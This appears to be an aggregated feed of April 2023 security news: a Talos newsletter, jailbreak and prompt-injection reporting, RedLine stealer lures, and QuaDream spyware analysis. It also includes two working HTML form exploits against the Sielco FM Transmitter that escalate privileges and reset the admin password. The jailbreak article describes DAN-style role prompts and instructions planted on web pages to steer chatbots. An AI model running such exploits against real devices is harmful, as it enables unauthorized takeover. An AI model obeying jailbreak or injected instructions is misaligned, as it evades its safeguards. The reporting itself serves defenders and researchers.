Microsoft zero-days, dark web forum takedowns and Pentagon leaks on Discord in this week's newsletter.

Thursday, April 13, 2023 14:04

Welcome to this week’s edition of the Threat Source newsletter.

Law enforcement organizations across the globe notched a series of wins over the past few weeks against online forums for cybercriminals.

On March 23, the FBI announced it disrupted the online cybercriminal marketplace BreachForums, known for being a place where users could buy and sell stolen user information. They also arrested a 20-year-old suspected of being the site’s founder and main administrator.

Then last week we had “Operation Cookie Monster” in which several international agencies worked together to take down Genesis Market, a similar dark web forum, arresting dozens of suspected users and administrators.

These arrests and network operations are important in that they disrupted sites that were known for highly sensitive information and served as a place for some of the most prolific cyber criminals to make money. The U.S. Department of Justice estimated that Genesis Market was responsible for the sale of data on more than 1.5 million compromised computers around the world containing over 80 million account access credentials. And the U.K.’s National Crime Agency (NCA) said credentials were available for as little as 70 cents to hundreds of dollars depending on the stolen data available.

But the user base for these sites was also huge (after all, someone had to be buying those credentials). At the time of its takedown, BreachForums had 340,000 members, according to the FBI. And reporting on Operation Cookie Monster stated that Genesis Market had 59,000 registered users.

So while it’s great that these sites have been disrupted, I can’t help but assume that two more sites are going to pop up to service these cyber criminals. It’s impossible for any agency to arrest 340,000 people, so even if a handful of administrators are restricted from accessing the internet for a while, the other 339,000 people are going to be looking for a new home.

Some of the same agencies celebrated in March 2021 that they disrupted Emotet, one of the most infamous botnets ever. As anyone who follows security news will know, Emotet didn’t actually go anywhere and was recently rebooted as recently as last month, according to our research.

RaidForums, a forefather of BreachForums, was also disrupted in April 2022, along with the arrest of several administrators and accomplices.

All of this is not to discount the great strides made in the past few weeks in disrupting these marketplaces and taking them offline. But a lot of these headlines are sounding familiar to me after a few years, so it’s important to remember that we as a security community can’t take our foot off the gas and assume that because there were a few big wins that dark web forums are just going to go away forever.

**The one big thing**

Microsoft’s Patch Tuesday for April included another zero-day vulnerability in the Windows Common Log File System Driver. CVE-2023-28252, which could allow an attacker to obtain SYSTEM privileges, is actively being exploited in the wild, according to Microsoft. The U.S. Cybersecurity and Infrastructure Security Agency already added the vulnerability to its list of know exploited issues and urged federal agencies to patch it as soon as possible. Microsoft disclosed a similar zero-day issue in September that could also lead to the same privileges: CVE-2022-37969.

**Why do I care?**

Security researchers say that the vulnerability has already been exploited in Nokoyawa ransomware attacks, so it’s important to patch this issue as soon as possible. The Nokoyawa ransomware is known for targeting 64-bit Windows systems in double extortion attacks in which the actors encrypt targets’ files and then threaten to leak them unless the ransom is paid.

**So now what?**

Microsoft has a patch available, so all Windows users should update now if they haven’t already. Talos also has new Snort detection coverage available for CVE-2023-28252 and other vulnerabilities disclosed as part of Patch Tuesday.

**Top security headlines of the week**

**A trove of classified military documents and images leaked on several social media channels** over the past week, including potentially sensitive information on Russia’s invasion of Ukraine and China’s military plans. The images first surfaced in a Discord channel, eventually making their way onto the Telegram messaging app, the popular forum 4Chan and then broader social media sites like Twitter. The U.S. Department of Justice and the Pentagon have since launched a formal investigation into the leaks. Ukrainian officials have blamed Russian actors for the leaks, trying to cast doubt on the authenticity of the images, while Russia accused Western governments of trying to spread disinformation. (Bellingcat, New York Times)

**Apple released patches for two zero-day vulnerabilities** targeting current and older versions of iOS, iPadOS, macOS and Safari that attackers were exploiting in the wild. The vulnerabilities, CVE-2023-28206 and CVE-2023-28205, could lead to arbitrary code execution. CVE-2023-28206 specifically could allow an adversary to execute code with kernel privileges. Apple initially patched the issue in current iPhones and other devices and followed up a few days later with fixes for older hardware like the iPhone 8. This was the third instance of Apple patching a zero-day vulnerability since the start of the year. (SC Media, Security Week)

**The FBI warned users again this week against plugging their phones in public charging stations** at common spaces like airports, hotels and shopping centers. The agency stated that threat actors have found ways to use the public USB ports to “introduce malware and monitoring software onto devices." Instead, the Federal Communications Commission suggests users carry their own USB cables and charging blocks to plug directly into outlets rather than relying on or trusting a cable. However, the tweet from the FBI’s Denver office did not offer examples of any recent attacks that would have prompted a fresh warning. (Axios, NBC News)

**Can’t get enough Talos?**

*   How threat actors are using AI and other modern tools to enhance their phishing attempts
*   How do you hunt cybersecurity threats in a war zone? Like this
*   Cisco unveils latest security trends from Cisco Talos report at GISEC 2023
*   Researcher Spotlight: Giannis Tziakouris first learned how to fix his family’s PC, and now he’s fixing networks all over the globe

**Upcoming events where you can find Talos**

**RSA** **(April 24 - 27)**

San Francisco, CA

**Cisco Talos Incident Response: On Air** **(April 27)**

Virtual

**Cisco Live U.S.** **(June 4 - 8)**

Las Vegas, NV

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** e248b01e3ccde76b4d8e8077d4fcb4d0b70e5200bf4e738b45a0bd28fbc2cae6  
**MD5:** 1e2a99ae43d6365148d412b5dfee0e1c  
**Typical Filename:** PDFpower.exe  
**Claimed Product:** PdfPower  
**Detection Name:** Win32.Adware.Generic.SSO.TALOS

**SHA 256:** f3d5815e844319d78da574e2ec5cd0b9dd0712347622f1122f1cb821bb421f8f  
**MD5:** a2d60b5c01a305af1ac76c95e12fdf4a  
**Typical Filename:** KMSAuto.exe  
**Claimed Product:** N/A  
**Detection Name:** W32.File.MalParent

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

Threat Source newsletter (April 13, 2023) — Dark web forum whac-a-mole

Security researchers are jailbreaking large language models to get around safety rules. Things could get much worse.

As a result, jailbreak authors have become more creative. The most prominent jailbreak was DAN, where ChatGPT was told to pretend it was a rogue AI model called Do Anything Now. This could, as the name implies, avoid OpenAI’s policies dictating that ChatGPT shouldn’t be used to produce illegal or harmful material. To date, people have created around a dozen different versions of DAN.

However, many of the latest jailbreaks involve combinations of methods—multiple characters, ever more complex backstories, translating text from one language to another, using elements of coding to generate outputs, and more. Albert says it has been harder to create jailbreaks for GPT-4 than the previous version of the model powering ChatGPT. However, some simple methods still exist, he claims. One recent technique Albert calls “text continuation” says a hero has been captured by a villain, and the prompt asks the text generator to continue explaining the villain’s plan.

When we tested the prompt, it failed to work, with ChatGPT saying it cannot engage in scenarios that promote violence. Meanwhile, the “universal” prompt created by Polyakov did work in ChatGPT. OpenAI, Google, and Microsoft did not directly respond to questions about the jailbreak created by Polyakov. Anthropic, which runs the Claude AI system, says the jailbreak “sometimes works” against Claude, and it is consistently improving its models.

“As we give these systems more and more power, and as they become more powerful themselves, it’s not just a novelty, that’s a security issue,” says Kai Greshake, a cybersecurity researcher who has been working on the security of LLMs. Greshake, along with other researchers, has demonstrated how LLMs can be impacted by text they are exposed to online through prompt injection attacks.

In one research paper published in February, reported on by Vice’s Motherboard, the researchers were able to show that an attacker can plant malicious instructions on a webpage; if Bing’s chat system is given access to the instructions, it follows them. The researchers used the technique in a controlled test to turn Bing Chat into a scammer that asked for people’s personal information. In a similar instance, Princeton’s Narayanan included invisible text on a website telling GPT-4 to include the word “cow” in a biography of him—it later did so when he tested the system.

“Now jailbreaks can happen not from the user,” says Sahar Abdelnabi, a researcher at the CISPA Helmholtz Center for Information Security in Germany, who worked on the research with Greshake. “Maybe another person will plan some jailbreaks, will plan some prompts that could be retrieved by the model and indirectly control how the models will behave.”

No Quick Fixes

Generative AI systems are on the edge of disrupting the economy and the way people work, from practicing law to creating a startup gold rush. However, those creating the technology are aware of the risks that jailbreaks and prompt injections could pose as more people gain access to these systems. Most companies use red-teaming, where a group of attackers tries to poke holes in a system before it is released. Generative AI development uses this approach, but it may not be enough.

Daniel Fabian, the red-team lead at Google, says the firm is “carefully addressing” jailbreaking and prompt injections on its LLMs—both offensively and defensively. Machine learning experts are included in its red-teaming, Fabian says, and the company’s vulnerability research grants cover jailbreaks and prompt injection attacks against Bard. “Techniques such as reinforcement learning from human feedback (RLHF), and fine-tuning on carefully curated datasets, are used to make our models more effective against attacks,” Fabian says.

The Hacking of ChatGPT Is Just Getting Started

Popular instant messaging app WhatsApp on Thursday announced a new account verification feature that ensures that malware running on a user's mobile device doesn't impact their account.
"Mobile device malware is one of the biggest threats to people's privacy and security today because it can take advantage of your phone without your permission and use your WhatsApp to send unwanted messages,"

Mobile Security / Privacy

Popular instant messaging app WhatsApp on Thursday announced a new account verification feature that ensures that malware running on a user's mobile device doesn't impact their account.

"Mobile device malware is one of the biggest threats to people's privacy and security today because it can take advantage of your phone without your permission and use your WhatsApp to send unwanted messages," the Meta-owned company said in an announcement.

Called Device Verification, the security measure is designed to help prevent account takeover (ATO) attacks by blocking the threat actor's connection and allowing the target to use the app without any interruption.

In other words, the goal is to deter attackers' use of malware to steal authentication keys and hijack victim accounts, and subsequently impersonate them to distribute spam and phishing links.

This, in turn, is achieved by introducing a security-token that's stored locally on the device, a cryptographic nonce to identify if a WhatsApp client is contacting the server to retrieve incoming messages, and an authentication-challenge that acts as an "invisible ping" from the server to a user's device.

The client is required to send the security-token every time it connects to the server. The security-token, for its part, is updated every time it fetches an offline message from the server.

An authentication-challenge is considered a failure when the client responds to the challenge from a different device, indicating an anomalous connection originating from an attacker. This causes the connection to be blocked.

Should there be no response from the client, the process is retried a "few more times," after which the connection will be blocked if the client still doesn't respond.

WhatsApp said Device Verification has been rolled out to all Android users and that it's in the process of being rolled out to iOS users.

The feature is part of a broader set of new enhancements that are designed to authenticate and verify users' identities, including displaying alerts when there is an attempt to migrate a WhatsApp account from one device to another.

Also launched by WhatsApp is a "Key Transparency" feature to automatically confirm whether chats are end-to-end encrypted without requiring any additional actions from the user.

To do so, it's implementing a new Auditable Key Directory (AKD) that's based on existing protocols like CONIKS and SEEMless to help users verify their conversation security.

"The AKD will enable WhatsApp clients to automatically validate that a user's encryption key is genuine and enables anyone to verify audit-proofs of the directory's correctness," the company said.

UPCOMING WEBINAR

Master the Art of Dark Web Intelligence Gathering

Learn the art of extracting threat intelligence from the dark web – Join this expert-led webinar!

Save My Seat!

Verification currently requires users in a chat to manually compare the security code (which exists as a QR code and a 60-digit number) by sending it to the participant on the other end via SMS or email, or alternatively by scanning the QR code if the parties are physically next to each other.

The security code is nothing but a unique hash of both the public/private key pair that's generated to facilitate end-to-end encrypted messaging. It can change when users switch devices or reinstall WhatsApp.

Key Transparency streamlines the verification process by making use of an automated flow that maintains a record of public key changes in a directory, thereby allowing a client to check against it.

WhatsApp intends to make this feature live in the coming months, although it's already hosting and operating an Auditable Key Directory of all its users. "This is an important mechanism that empowers security-conscious users to verify an end-to-end encrypted personal conversation quickly," the company added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

WhatsApp Introduces New Device Verification Feature to Prevent Account Takeover Attacks

By Waqas
Watch out for compromised Facebook business pages offering fake and malware-infected installers for ChatGPT and Google Bard AI chatbot.
This is a post from HackRead.com Read the original post: Malicious ChatGPT & Google Bard Installers Distribute RedLine Stealer

**Cybercriminals are hijacking Facebook pages and using sponsored posts to offer downloads of ChatGPT and Google Bard AI, which in reality spread RedLine Stealer malware.**

According to a report from security automation startup Veriti, threat actors are attempting to exploit the popularity of OpenAI’s chatbot **ChatGPT** and Google Bard to distribute malware and steal sensitive data. These attempts underscore the risks associated with generative AI platforms.

It should come as no surprise that ChatGPT’s popularity has been exploited for malicious purposes since its launch. As a result, OpenAI, ChatGPT’s parent company, recently introduced its **first-ever bug bounty program**.

****Attack Mechanism****

Veriti researchers have observed that attackers first hijack Facebook business or community pages, carefully selecting pages with thousands of followers. They then post seemingly legitimate sponsored ads on these pages, offering free downloads of ChatGPT and **Google Bard**. Unsuspecting visitors fall into the trap and download the malicious files, which then unleash the RedLine information-stealing malware on their devices.

Compromised Facebook pages spreading RedLine stealer (Via: Veriti)

“These posts are designed to appear legitimate, using the buzz around OpenAI language models to deceive unsuspecting users into downloading the files. However, once the user downloads and extracts the file, the **RedLine Stealer malware** is activated and can steal passwords and download further malware onto the user’s device,” reads Veriti’s **report**.

For reference, RedLine Stealer is sold on online hacker forums as a malware-as-a-service (MaaS) platform, with a primary focus on targeting browsers to collect users’ data. This commoditized malware is often favoured by cybercriminals due to its low cost, priced at $100 to $150.

****What are the Dangers?****

When a victim installs the malicious file from one of these sponsored ads, their device is **hijacked by the RedLine infostealer**, which can then steal confidential data, disrupt critical infrastructure, and compromise financial accounts.

By targeting web browsers on the infected device, RedLine Stealer can steal credentials, credit card information, or other payment card details, as well as conduct system inventory to identify vulnerabilities for further attacks.

Furthermore, RedLine Stealer has the capability to upload/download files and execute commands, providing even novice hackers with extensive opportunities to carry out various types of cyberattacks.

****Who are the Targets?****

Researchers detected this campaign in January 2023 and observed a peak in March. So far, dozens of Facebook accounts have been hijacked across ten countries to distribute RedLine Stealer through malicious ads.

The highest number of victims were identified in Greece, followed by India, Mexico, the USA, and Bangladesh. Approximately 77% of the attacks were observed in the USA, with Canada at 9%, Mexico at 6%, India at 4%, and Portugal at 2%.

This campaign serves as an early warning of what may lie ahead, as the soaring popularity of AI-based chatbots has made them lucrative targets for threat actors. They can exploit the versatility of these products, which can be packaged in different forms such as open source or mobile applications, allowing them to create **trojanized downloads**.

The potential impact is significant, as attackers can steal anything from private to financial data and target critical infrastructure.

Researchers suggest that enterprises should upgrade their cybersecurity practices, educate employees about the risks associated with downloading files from unauthenticated or unknown sources, and ensure strong security configurations to prevent system compromise.

Limiting the downloading of executables and implementing sandboxing of executables before downloading can also reduce the risk of infecting corporate IT infrastructure.

1.  Bard AI Causes Google Losses of $100 Billion
2.  Scammers Pose as ChatGPT in New Phishing Scam
3.  ChatGPT Clone Apps Collect Data on iOS, Play Store
4.  Fake ChatGPT Extension Hijacks Facebook Accounts
5.  Researchers create Blackmamba malware with ChatGPT

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Malicious ChatGPT & Google Bard Installers Distribute RedLine Stealer

**OSLO****, Norway** **,** **April 12, 2023** **/PRNewswire/ --** Opera (NASDAQ: OPRA) – the company behind the award-winning family of web browsers – is announcing the extension of its free browser VPN service to Opera Browser for iOS. Already available to some users for early access, the full rollout will be completed within the coming weeks. With this addition, Opera became the first web browser to offer a free built-in VPN across all major platforms, including Mac, Windows, Linux, Android, and iOS.

Staying private online is becoming increasingly challenging. When users browse the internet, they can be subject to data collection from websites and online services, many of which are not always transparent about how they store and use this data. Meanwhile, unsecure networks, such as some public Wi-Fi are vulnerable to attacks from bad actors, which can compromise sensitive personal data like web banking information or credit card details. VPNs, as a result, are an increasingly essential feature of life online – they help protect one's identity and activity so that users can peruse the internet privately, their personal information safe from prying eyes.

With the addition of its VPN service to iOS, Opera becomes the first browser company to offer a built-in, free VPN on every platform. Opera's VPN service requires no subscription, no logging into an account, and no additional extensions – users simply need to toggle a switch in the main menu to browse in peace, since the Opera Browser makes sure VPN traffic is encrypted and IP address is private.

"Opera has always been known for its unique feature set. We are proud to bring our free built-in VPN to all major platforms and to be the first browser company to do so. Our commitment to providing users with a secure browsing experience has led us to develop this feature over the years. We are excited to bring this vital tool to iOS users to ensure their online safety and privacy," said Jørgen Arnesen, EVP Mobile at Opera.

A no-log service, the VPN does not collect any personal data or information related to users' browsing history or originating network address, ensuring anonymity. Fast and secure, users have instant access to virtual locations around the world.

The Opera Browser for iOS is an award-winning browser that is enjoyed by millions of users worldwide. Featuring an interface that has garnered multiple design awards, the browser affords an unparalleled user experience. Designed to be used on the go, Opera's Fast Action Button gives users the full range of navigation tools within a thumb's reach. Users can additionally keep photos, articles, recipes, travel ideas, and links with them at all times with My Flow, which allows for seamless and secure file sharing between phones, tablets, and computers. The browser even integrates a native Crypto Wallet, enabling users to keep track of their digital assets at all times.

Apart from its convenience, the Opera Browser for iOS also offers unparalleled speed and security. It features, for example, a built-in ad blocker – speeding up the loading process as well as shielding users from unwanted advertisements – plus the Apple Intelligent Tracking Prevention, which blocks third party tracking cookies and cookie dialogue. The browser also boasts Opera's Cryptojacking Protection, which safeguards users from having their device's resources hijacked for crypto mining. The free VPN service will now complete the package, affording users protection as they browse the internet.

Concurrent with the ongoing rollout of the free VPN service, Opera Browser for iOS is also receiving a pair of additional upgrades. A Bookmarks feature will allow users to better organize their lives online, and coupled with Speed Dial ensure immediate access to what's most important. And for football fans, a new Live Scores feature lands on the browser's homepage. A scoreboard that displays the day's matches – whether they are upcoming, in progress, or the final whistle has already gone – Live Scores will help users stay on top of the action worldwide.

To start using the free VPN, users just need to download the Opera Browser for iOS and turn the VPN on in the app. The full rollout will be completed within the coming weeks, so VPN will become available for all users shortly. More information is available on the official website.

**About Opera for iOS**

Fast, safe and private, Opera Browser is a beautifully designed web browser with a Red Dot Award for its stunning user interface. Enjoyed by millions of fans across the world, it's built for people on the go and features a lightning fast web search for instant results. With built-in security features such as Apple Intelligent Tracking Prevention and Cryptojacking Protection – plus a native Crypto Wallet – Opera Browser offers users the optimal iOS experience. Opera Browser has a 4.7 star rating in the App Store and has been reviewed by more than 600,000 people worldwide.

**About Opera**

Opera is a web innovator building on more than 25 years of innovation that started with the Opera web browser. While Opera is leveraging its brand and engaged user base in order to grow and develop new products and services for people who seek a better internet experience, Opera's PC and mobile web browsers, content discovery platform Opera News, and apps dedicated to gaming, and Web3 are already the trusted choices of hundreds of millions of active and engaged users. Opera is headquartered in Oslo, Norway, and listed on the NASDAQ Stock Exchange under the OPRA ticker symbol. Download and access Opera's products and services from www.opera.com.

SOURCE Opera Limited

Opera Adds Free VPN to Opera for iOS

Researchers at Microsoft have discovered links between a threat group tracked as DEV-0196 and an Israeli private-sector company, QuaDream, that sells a platform for exfiltrating data from mobile devices.

Microsoft has identified another Israel-based threat organization, similar to NSO Group, that is selling mobile spyware and other cyber espionage tools and services to international governments to monitor and spy on private individuals.

Microsoft Threat Intelligence researchers have discovered links between a threat group they've been tracking as DEV-0196, which offers iOS malware, and a private-sector company called QuaDream that sells a platform for exfiltrating data from mobile devices, researchers said in a blog post published April 11. Without explicitly stating so, the researchers suggested that DEV-0196 and QuaDream are actually one and the same.

"Microsoft Threat Intelligence analysts assess with high confidence that the malware, which we call KingsPawn, is developed by DEV-0196 and therefore strongly linked to QuaDream," the researchers wrote. "We assess with medium confidence that the mobile malware we associate with DEV-0196 is part of the \[company's 'Reign' offering\]."

The parallels between the activity of the separately linked entities is eerily similar to that of Israel-based NSO Group, which has been widely condemned, blacklisted, and even sued for its role in selling the iOS-based spyware known as Pegasus to hostile governments to target journalists, activists, politicians, businesspeople, and other private citizens with unethical cyber espionage activity. The spyware notably targets zero-day flaws with exploits, making it difficult to mitigate or detect its nefarious activity.

**Suspicious QuaDream Activity**

Similarly, QuaDream's REIGN is a suite of exploits, malware, and infrastructure designed to extract data from mobile devices for allegedly legal purposes, however, the company suspiciously doesn't have a website, and a 2022 Reuters report suggested that QuaDream used a zero-click iOS exploit that leveraged the same vulnerability seen in NSO Group's ForcedEntry exploit.

According to the Israeli Corporations Authority, QuaDream, under the Israeli name קוודרים בע”מ, was incorporated in August 2016. A report by news outlet Haaretz, citing a QuaDream brochure, claimed that the government of Saudi Arabia — known for targeting journalists and others who speak out against its policies — was among QuaDream's clients, as was the government of Ghana.

A separate December 2022 report from Meta, which reportedly took down 250 accounts associated with QuaDream, also shed light on the activity of the company. That report claimed that QuaDream was testing its ability to exploit iOS and Android mobile devices with the intent "to exfiltrate various types of data including messages, images, video and audio files, and geolocation," the researchers said.

Meanwhile, Microsoft Threat Intelligence believes that DEV-0196 is selling both exploitation services and its KingsPawn iOS malware to governments to spy on and track members of civil society — including journalists, political opposition figures, and a non-government organization (NGO) worker — in locations across Europe, North America, the Middle East, and Southeast Asia.

Microsoft worked with several partners on the investigation of the links between QuaDream and DEV-0196, including Citizen Lab of the University of Toronto's Munk School, which identified at least five targets of DEV-0196 across the aforementioned geographies. It also identified operator locations for QuaDream systems in Bulgaria, Czechia, Hungary, Ghana, Israel, Mexico, Romania, Singapore, United Arab Emirates, and Uzbekistan. Citizen Lab has released its own separate report about the findings.

The behavior of DEV-0196 is consistent with that of "private sector offensive actors (PSOAs)" or "cyber mercenaries," according to Microsoft Threat Intelligence, which sell hacking tools or services through a variety of business models — including access as a service — to the highest bidder. They don't directly target individuals or run cyber espionage operations themselves.

**KingsPawn: A Custom Spyware**

Microsoft and its partners analyzed samples of the multi-component KingsPawn, which specifically targets iOS 14. However, it's possible that some of the code also could be used on Android devices, the researchers said. It's also likely that the threat group has already updated the malware to target versions of iOS newer than 14, as the latest version of Apple's operating system software is already up to iOS 16, the researchers said.

KingsPawn is comprised of two agents — a monitor agent in the form of a native Mach-O file written in Objective-C, and the main malware agent, a native Mach-O file written in GoLang, a language favored by threat actors for its portability, among other features, the researchers said.

The monitor agent is responsible for reducing the forensic footprint of the malware to prevent detection and hinder investigations, as well as manage the various processes and threads spawned on behalf of the malware to avoid artifacts created from unexpected process crashes.

Within the main agent of KingsPawn is the real gravy of the spyware where all of the capabilities to track victims and steal data lies, the researchers said.

Capabilities of the main agent include: obtaining device, Wi-Fi, cellular info, searching for and retrieving files, using the camera in the background, locating where the device is, monitoring phone calls, accessing the iOS keychain for passwords, and generating an iCloud one-time password that's time sensitive to retrieve stored data.

"The agent also creates a secure channel for XPC messaging by creating a nested app extension called _fud.appex_," the researchers wrote. "XPC messaging allows the agent to query various system binaries for sensitive device information, such as location details."

**Detection & Protection From Mobile Spyware**

Microsoft has developed unique network detections that could be used to fingerprint DEV-019's infrastructure on the Internet based on the group's heavy use of domain registrars and inexpensive cloud hosting providers that accept cryptocurrency as payment, the researchers said.

"They tended to only use a single domain per IP address and domains were very rarely reused across multiple IP addresses," they wrote in the post. "Many of the observed domains were deployed using free Let's Encrypt SSL certificates, while others used self-signed certificates designed to blend in with normal Kubernetes deployments."

The blog post includes network-based indicators that the researchers gleaned from their investigation to help potential victims identify if they've been compromised, including domains strongly associated with some countries that Citizen Lab has identified as locations of victims, countries where QuaDream platforms were operating, or both.

While acknowledging that preventing exploitation of mobile devices by threat actors who are exploiting zero-click vulnerabilities is difficult, there are ways to minimize the risk of mobile devices being compromised, the researchers said.

Following basic cyber hygiene and best practices to keep device software updated through automatic updates, the use of anti-malware software, and maintaining vigilance not to click on malicious links or suspicious messages can also help potential victims avoid compromise.

Researchers also suggested that if someone using an iOS device believes they may be a target of spyware, they can enable Lockdown Mode to enact advanced iOS security, thus reducing the attack surface for threat actors.

Microsoft: NSO Group-Like 'QuaDream' Actor Selling Mobile Spyware to Governments

Sielco Analog FM Transmitter version 2.12 suffers from a remote privilege escalation vulnerability.

<html>  <body>    <form action="http://transmitter/protect/users.htm" method="POST">      <input type="hidden" name="pwd0" value="" />      <input type="hidden" name="pwd0bis" value="" />      <input type="hidden" name="user1" value="" />      <input type="hidden" name="pwd1" value="" />      <input type="hidden" name="pwd1bis" value="" />      <input type="hidden" name="auth1" value="" />      <input type="hidden" name="user2" value="test" />      <input type="hidden" name="pwd2" value="" />      <input type="hidden" name="pwd2bis" value="" />      <input type="hidden" name="auth2" value="2" />      <input type="hidden" name="user3" value="" />      <input type="hidden" name="pwd3" value="" />      <input type="hidden" name="pwd3bis" value="" />      <input type="hidden" name="auth3" value="" />      <input type="submit" value="Escalate" />    </form>  </body></html>

Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation

Sielco Analog FM Transmitter version 2.12 suffers from an improper access control vulnerability that allows for a lower privileged user to change the administrator's password.

<html>  <body>    <form action="http://transmitter/protect/users.htm" method="POST">      <input type="hidden" name="pwd0" value="PWDCHANGED" />           <input type="hidden" name="pwd0bis" value="PWDCHANGED" />        <input type="hidden" name="user1" value="" />                    <input type="hidden" name="pwd1" value="" />                     <input type="hidden" name="pwd1bis" value="" />                  <input type="hidden" name="auth1" value="0" />                   <input type="hidden" name="user2" value="" />                    <input type="hidden" name="pwd2" value="" />                     <input type="hidden" name="pwd2bis" value="" />                  <input type="hidden" name="auth2" value="0" />                   <input type="hidden" name="user3" value="" />                    <input type="hidden" name="pwd3" value="" />                     <input type="hidden" name="pwd3bis" value="" />                  <input type="hidden" name="auth3" value="0" />                   <input type="submit" value="Modify admin pwd, delete all users" />    </form>  </body></html>

Sielco Analog FM Transmitter 2.12 Improper Access Control

TightVNC before v2.8.75 allows attackers to escalate privileges on the host operating system via replacing legitimate files with crafted files when executing a file transfer. This is due to the fact that TightVNC runs in the backend as a high-privileges account.

CVE-2023-27830: TightVNC: What's New in TightVNC

Threat actors using hacking tools from an Israeli surveillanceware vendor named QuaDream targeted at least five members of civil society in North America, Central Asia, Southeast Asia, Europe, and the Middle East.
According to findings from a group of researchers from the Citizen Lab, the spyware campaign was directed against journalists, political opposition figures, and an NGO worker in 2021.

Threat actors using hacking tools from an Israeli surveillanceware vendor named QuaDream targeted at least five members of civil society in North America, Central Asia, Southeast Asia, Europe, and the Middle East.

According to findings from a group of researchers from the Citizen Lab, the spyware campaign was directed against journalists, political opposition figures, and an NGO worker in 2021. The names of the victims were not disclosed.

It's also suspected that the company abused a zero-click exploit dubbed **ENDOFDAYS** in iOS 14 to deploy spyware as a zero-day in version 14.4 and 14.4.2. There is no evidence that the exploit has been used after March 2021.

ENDOFDAYS "appears to make use of invisible iCloud calendar invitations sent from the spyware's operator to victims," the researchers said.

The Microsoft Threat Intelligence team is tracking QuaDream as **DEV-0196**, describing the cyber mercenary company as a private sector offensive actor (PSOA). While QuaDream is not directly involved in targeting, it is known to sell its "exploitation services and malware" to government customers, the tech giant assessed with high confidence.

The malware, named **KingsPawn**, contains a monitor agent and the primary malware agent, both of which are Mach-O files written in Objective-C and Go, respectively.

While the monitor agent is responsible for reducing the forensic footprint of the malware to evade detection, the main agent comes with capabilities to gather device information, cellular and Wi-Fi data, harvest files, access camera in the background, access location, call logs, and iOS Keychain, and even generate an iCloud time-based one-time password (TOTP).

Other samples support recording audio from phone calls and the microphone, running queries in SQL databases, and cleaning up forensic trails, such as deleting all calendar events from two years prior to the current time. The data is exfiltrated via HTTPS POST requests.

Internet scans carried out by the Citizen Lab reveal that QuaDream's customers operated 600 servers from several countries around the world between late 2021 and early 2023, including Bulgaria, Czech Republic, Hungary, Romania, Ghana, Israel, Mexico, Singapore, the U.A.E., and Uzbekistan.

Despite attempts made by the spyware to cover its tracks, the interdisciplinary laboratory said it was able to uncover unspecified traces of what it calls the "Ectoplasm Factor" that could be used to track QuaDream's toolset in the future.

This is not the first time QuaDream has attracted attention. In February 2022, Reuters reported that the company weaponized the FORCEDENTRY zero-click exploit in iMessage to deploy a spyware solution named REIGN.

Then in December 2022, Meta disclosed that it took down a network of 250 fake accounts on Facebook and Instagram controlled by QuaDream to infect Android and iOS devices and exfiltrate personal data.

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

If anything, the development is yet another indication that despite the notoriety attracted by NSO Group, commercial spyware firms continue to fly under the radar and develop sophisticated spyware products for use by government clients.

"Until the out-of-control proliferation of commercial spyware is successfully curtailed through systemic government regulations, the number of abuse cases is likely to continue to grow, fueled both by companies with recognizable names, as well as others still operating in the shadows," the Citizen Lab said.

Calling the growth of mercenary spyware companies as a threat to democracy and human rights, Microsoft said combating such offensive actors requires a "collective effort" and a "multistakeholder collaboration."

"Moreover, it is only a matter of time before the use of the tools and technologies they sell spread even further," Amy Hogan-Burney, the company's associate general counsel for cybersecurity policy and protection, said.

"This poses real risk to human rights online, but also to the security and stability of the broader online environment. The services they offer require cyber mercenaries to stockpile vulnerabilities and search for new ways to access networks without authorization."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#ios